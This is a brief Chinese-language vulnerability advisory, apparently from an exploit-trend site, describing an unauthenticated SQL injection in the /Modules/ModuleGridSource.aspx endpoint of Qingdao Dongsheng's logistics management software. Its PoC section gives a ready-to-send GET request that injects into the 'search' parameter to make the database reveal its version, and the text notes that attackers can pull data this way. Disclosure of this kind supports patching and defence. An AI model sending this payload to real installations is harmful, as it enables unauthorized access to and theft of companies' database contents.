东胜物流软件 /Modules/ModuleGridSource.aspx list SQL 注入漏洞

2026-04-17 东胜物流软件 PoC Public

Description

东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统 /Modules/ModuleGridSource.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL 注入漏洞获取数据库中的信息

PoC

GET /Modules/ModuleGridSource.aspx?handle=list&search=name:a%')and+<@@VERSION-- HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities